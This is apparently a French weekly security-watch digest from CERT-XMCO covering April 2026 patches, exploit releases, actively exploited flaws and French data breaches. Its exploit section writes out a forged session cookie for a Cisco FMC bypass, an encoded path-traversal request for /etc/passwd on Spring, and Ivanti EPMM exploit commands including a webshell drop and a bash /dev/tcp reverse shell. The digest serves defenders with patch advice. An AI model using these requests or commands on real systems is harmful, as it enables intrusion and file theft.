Résumé de la semaine #16 (du 13 au 17 avril 2026)

Publication du Patch Tuesday par Microsoft et exploitation active des failles BlueHammer, RedSun et UnDefend affectant Windows, les experts du service de veille cyber Yuno vous livrent une synthèse des évènements clés pour vous permettre de rester informés et d’anticiper les risques.

Correctifs

Cette semaine, le CERT-XMCO recommande en priorité l’application des correctifs publiés par Microsoft dans le cadre de son Patch Tuesday [1] et pour Edge [2], par Cisco pour Identity Services Engine [3], par Sonatype pour Nexus Repository Manager [4], par Siemens [5], par Google pour Chrome [6], par Progress [7], par Splunk [8], par Hashicorp pour Vault [9], par Mattermost [10], par Adobe pour Photoshop [11], ColdFusion [12] et Reader [13], par SAP [14], par Grafana [15] et par Fortinet [16].

Codes d'exploitation

Cette semaine, 3 codes d'exploitation ont été publiés. Un correctif est disponible pour chacun d'entre eux.

Contournement de sécurité via une vulnérabilité au sein de Cisco Secure Firewall Management Center (FMC) Software [17]

La vulnérabilité, référencée CVE-2026-20079, affecte Cisco Secure FMC Software. L'exploitation de cette faille permet à un attaquant distant et non authentifié de contourner l'authentification, d'exécuter des fichiers de script et d'obtenir un accès root au système d'exploitation sous-jacent. En envoyant une requête GET /help/about.cgi sans cookie de session, un attaquant reçoit une réponse 302 accompagnée du message Invalid session ID, confirmant la présence d’un mécanisme d’authentification. Il peut ensuite contourner ce contrôle en renvoyant la même requête GET /help/about.cgi avec un cookie forgé Cookie: CGISESSID=csm_processes, ce qui lui permet d’obtenir une réponse 200 contenant des informations sensibles telles que le produit Cisco Secure Firewall Management Center, le modèle, le système d’exploitation et le hostname. Le code valide ainsi l'exécution de commande à distance. Le CERT-XMCO recommande l'installation de la dernière version de Cisco Secure FMC Software, accessibles en utilisant l'outil Software Checker, disponible à l'adresse suivante : https://sec.cloudapps.cisco.com/security/center/softwarechecker.x

Divulgation d'informations via une vulnérabilité au sein de Spring Framework [18]

La vulnérabilité, référencée CVE-2024-38819, affecte Spring Framework. L'exploitation de cette faille permet à un attaquant distant d'envoyer une requête HTTP spécifiquement conçue afin de lire des fichiers arbitraires sur le système. En envoyant une requête GET /etc/passwd, un attaquant vérifie que l’accès direct au fichier est bloqué, l’absence du motif root:.*:0:0:dans la réponse confirmant la protection. Il peut ensuite contourner ce contrôle en envoyant une requête forgée GET /static/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd, exploitant une traversée de répertoires (path traversal) encodée. Cette seconde requête retourne un statut 200 ainsi que le contenu du fichier /etc/passwd, permettant à l’attaquant d’accéder à des informations sensibles du système. Le CERT-XMCO recommande l'installation de la version 5.3.41, 6.0.25 ou 6.1.14 de Spring Framework disponible via le support VMware.

Prise de contrôle du système via 2 vulnérabilités au sein d'Ivanti Endpoint Manager Mobile [19]

Les vulnérabilités, référencées CVE-2026-1281et CVE-2026-1340, affectent Ivanti Endpoint Manager Mobile. L'exploitation de ces failles permet à un attaquant distant et non authentifié de prendre le contrôle du système. En ciblant une instance Ivanti EPMM exposée, un attaquant est en mesure d’identifier les endpoints /mifs/c/appstore/fob/ (CVE-2026-1281) et /mifs/c/aftstore/fob/ (CVE-2026-1340) avec python3 exploit.py -t <target> -c, puis de vérifier la capacité d’exécution de code à distance via python3 exploit.py -t <target> --test-rce, en déclenchant la commande sleep 5. Une fois la vulnérabilité confirmée, il peut exécuter des commandes système arbitraires avec python3 exploit.py -t <target> -x "id > /tmp/poc". Enfin, l’attaquant peut aller plus loin dans la compromission en déposant un webshell via --webshell, reposant sur une écriture de fichier echo ... > /mi/webshell.jsp, ou obtenir un accès interactif au système via --reverse-shell 10.10.14.5:4444, en établissant une connexion inverse avec bash -i >& /dev/tcp/{lhost}/{lport} 0>&1, menant à une prise de contrôle complète du système. Le CERT-XMCO recommande l'installation des correctifs de sécurité publiés par Ivanti : Ivanti Endpoint Manager Mobile RPM 12.x.0.x ou RPM 12.x.1.x

Informations

Vulnérabilités

Exploitation active de la CVE‑2026‑33032 affectant Nginx et permettant une prise de contrôle du système [20]

Le 15 avril 2026, les chercheurs de Pluto Security, à l’origine de la découverte, et les mainteneurs de nginx‑ui ont publié une analyse détaillée d’une vulnérabilité critique activement exploitée affectant l’intégration MCP (Model Context Protocol) de l’interface d’administration nginx‑ui, référencée CVE‑2026‑33032 (CVSS : 9,8). La faille de sécurité provenait d’une erreur d’autorisation dans la gestion différenciée des endpoints. Elle permettait à un attaquant distant et non authentifié, disposant d’un simple accès réseau au port par défaut, de déclencher des appels MCP sur le pseudo‑endpoint afin de prendre le contrôle complet du service Nginx.

Vulnérabilité RCE sans authentification affectant Marimo exploitée moins de dix heures après divulgation [21]

Le 9 avril 2026, les chercheurs de Sysdig ont publié une analyse décrivant l'exploitation active d’une vulnérabilité critique de type exécution de code à distance pré‑authentifié affectant Marimo, un notebook Python réactif open source. L'article démontre que la vulnérabilité était exploitée dans la nature moins de dix heures après sa divulgation initiale. Cette faille, référencée en tant que CVE‑2026‑39987 (VCSS : 9,3), provenait de l’endpoint WebSocket /terminal/ws qui exposait un terminal interactif sans aucune validation d’authentification, permettant à un attaquant distant et non authentifié d’obtenir un shell PTY complet avec les privilèges du processus Marimo sur les versions 0.20.4 et antérieures. L'éditeur a publié un correctif de sécurité pour cette vulnérabilité au sein des versions 0.23.0 et ultérieures.

NIST modifie le fonctionnement du NVD face à l’augmentation record du nombre de CVE [22]

Le 15 avril 2026, les responsables du NIST ont publié une analyse des évolutions opérationnelles de la National Vulnerability Database (NVD), faisant face à une croissance record du volume de CVE soumis. Le NIST annonce l’abandon de l’objectif d’enrichir systématiquement toutes les entrées au profit d’un modèle de priorisation fondé sur le risque, dans lequel seules certaines catégories de vulnérabilités recevront des métadonnées détaillées (score de sévérité, liste de produits, etc.). Cette restructuration s’inscrit dans un contexte d’augmentation de 263% des soumissions entre 2020 et 2025 et d’un nouveau pic au premier trimestre 2026, et ce malgré une hausse de 45% du nombre de CVE enrichies en 2025.

Exploitation active des failles BlueHammer, RedSun et UnDefend affectant Windows [23]

Le 17 avril 2026, le chercheur en sécurité Chaotic Eclipse a publié une analyse montrant que trois vulnérabilités Windows récemment divulguées, BlueHammer, RedSun et UnDefend, sont désormais exploitées par des attaquants pour obtenir des permissions SYSTEM ou administrateur. Deux de ces failles, BlueHammer et RedSun, sont des élévations de privilèges locales dans Microsoft Defender, tandis que UnDefend permet à un utilisateur standard de bloquer les mises à jour de signatures Defender, compromettant ainsi les capacités de détection. Ces exploits ont été rendus publics par le chercheur Chaotic Eclipse (Nightmare‑Eclipse) pour protester contre la gestion de la divulgation par le Microsoft Security Response Center (MSRC), créant une fenêtre d’exposition significative entre publication et correctifs.

France

Incident de sécurité entrainant une fuite de données de certains élèves de l'Éducation nationale [24]

Le 14 avril 2026, le ministère de l’Éducation nationale a subi un incident de sécurité, entraînant la fuite de données personnelles de certains élèves, dont le nombre exact reste inconnu. Les informations compromises incluent le nom, prénom, identifiant ÉduConnect, établissement et classe, l’adresse email ainsi que le code d’activation de comptes non encore activés. L’origine de l’incident remonte à une usurpation d’identité d’un personnel autorisé à la fin de 2025, qui a permis un accès illégal au système de gestion des comptes annexé à ÉduConnect.

Le groupe ransomware Secp0 revendique la compromission d'Indigo Group [25]

Le 14 avril 2026, le groupe ransomware Secp0 a revendiqué la compromission de la société française Indigo Group, spécialisée dans la gestion et l’exploitation de parkings publics et privés. Les données publiées comprendraient près de 900 000 fichiers uniques qui appartiendraient à plus de 27 000 organisations. Celles-ci incluraient des documents commerciaux, financiers, des données personnelles, ainsi que des données de santé. Dans une autre publication, les opérateurs de Secp0 affirment qu'ils n'ont aucun lien avec un autre groupe ransomware nommé Word Leaks qui avait déjà revendiqué la compromission d'Indigo Group en mai 2025.

Fuite de données chez Basic Fit touchant environ un million de membres [26]

Le 13 avril 2026, BleepingComputer a révélé que la chaîne de salles de sport néerlandaise Basic-Fit, présente dans douze pays européens via ses deux marques Basic Fit et Clever-Fit, a subi une fuite de données, incluant notamment des données bancaires. Environ un million de membres seraient concernés, répartis aux Pays-Bas, en Belgique, au Luxembourg, en France, en Espagne et en Allemagne. Selon l’entreprise, aucun mot de passe n’a été compromis et les membres impactés ont été informés.

——————————————————————————————————–

Références

[1]

• https://msrc.microsoft.com/update-guide/en-us/releaseNote/2026-Apr

[2]

• https://learn.microsoft.com/en-us/DeployEdge/microsoft-edge-relnotes-security#april-16-2026

[3]

• https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-cmd-inj-5WSJcYJB

• https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ

• https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-isexss-BS8ctE7U

• https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-4fverepv

[4]

• https://support.sonatype.com/hc/en-us/articles/50817138825491-CVE-2026-5189-Nexus-Repository-3-Hardcoded-Credential-in-Internal-Database-Component-2026-04-15

[5]

• https://cert-portal.siemens.com/productcert/html/ssa-019200.html

[6]

• https://chromereleases.googleblog.com/2026/04/stable-channel-update-for-desktop_15.html

• https://chromereleases.googleblog.com/2026/04/chrome-for-android-update_15.html

[7]

• https://community.progress.com/s/article/Unintended-Use-of-OECH1-for-Password-Secrets-Protection

• https://community.progress.com/s/article/Important-Arbitrary-File-Ready-Security-Update-for-OpenEdge-AdminServer

[8]

• https://advisory.splunk.com//advisories/SVD-2026-0408

[9]

• https://discuss.hashicorp.com/t/hcsec-2026-05-vault-kvv2-metadata-and-secret-deletion-policy-bypass-denial-of-service/77342

• https://discuss.hashicorp.com/t/hcsec-2026-07-vault-may-expose-tokens-to-auth-plugins-due-to-incorrect-header-sanitization/77344

• https://discuss.hashicorp.com/t/hcsec-2026-06-vault-vulnerable-to-server-side-request-forgery-in-acme-challenge-validation-via-attacker-controlled-dns/77343

[10]

• https://mattermost.com/security-updates/

[11]

• https://helpx.adobe.com/security/products/photoshop/apsb26-40.html

[12]

• https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html

[13]

• https://helpx.adobe.com/security/products/acrobat/apsb26-44.html

[14]

• https://support.sap.com/en/my-support/knowledge-base/security-notes-news/april-2026.html

• https://github.com/grafana/grafana/releases/tag/v12.4.3

[16]

• https://fortiguard.fortinet.com/psirt/FG-IR-26-120

• https://fortiguard.fortinet.com/psirt/FG-IR-26-121

[17]

• https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-20079.yaml

[18]

• https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-38819.yaml

[19]

• https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE

• https://www.cisa.gov/news-events/alerts/2026/04/08/cisa-adds-one-known-exploited-vulnerability-catalog

[20]

• https://pluto.security/blog/mcp-bug-nginx-security-vulnerability-cvss-9-8/

• https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h6c2-x2m2-mwhf

• https://www.recordedfuture.com/blog/march-2026-cve-landscape

• https://thehackernews.com/2026/04/critical-nginx-ui-vulnerability-cve.html

• https://www.bleepingcomputer.com/news/security/critical-nginx-ui-auth-bypass-flaw-now-actively-exploited-in-the-wild/

[21]

• https://www.sysdig.com/blog/marimo-oss-python-notebook-rce-from-disclosure-to-exploitation-in-under-10-hours

• https://thehackernews.com/2026/04/marimo-rce-flaw-cve-2026-39987.html

• https://securityaffairs.com/190623/hacking/cve-2026-39987-marimo-rce-exploited-in-hours-after-disclosure.html

• https://www.bleepingcomputer.com/news/security/critical-marimo-pre-auth-rce-flaw-now-under-active-exploitation/

• https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc

• https://github.com/marimo-team/marimo/releases

[22]

• https://www.nist.gov/news-events/news/2026/04/nist-updates-nvd-operations-address-record-cve-growth

[23]

• https://www.bleepingcomputer.com/news/security/recently-leaked-windows-zero-days-now-exploited-in-attacks/

• https://x.com/HuntressLabs/status/2044882050314817880

• https://www.bleepingcomputer.com/news/microsoft/new-microsoft-defender-redsun-zero-day-poc-grants-system-privileges/

• https://github.com/Nightmare-Eclipse

[24]

• https://www.education.gouv.fr/incident-de-securite-affectant-les-donnees-de-certains-eleves-de-l-education-nationale-504443

[25]

• https://www.ransomlook.io/group/secp0

• https://blog.lexfo.fr/analysis-of-secp0-ransomware.html

• https://blog.lexfo.fr/world-leaks-an-extortion-platform.html

[26]

• https://www.documentcloud.org/documents/28037997-basic-fit-press/

• https://www.lemonde.fr/pixels/article/2026/04/13/fuite-de-donnees-chez-basic-fit-un-million-de-membres-concernes-des-coordonnees-bancaires-piratees_6679702_4408996.html

• https://www.bleepingcomputer.com/news/security/european-gym-giant-basic-fit-data-breach-affects-1-million-members/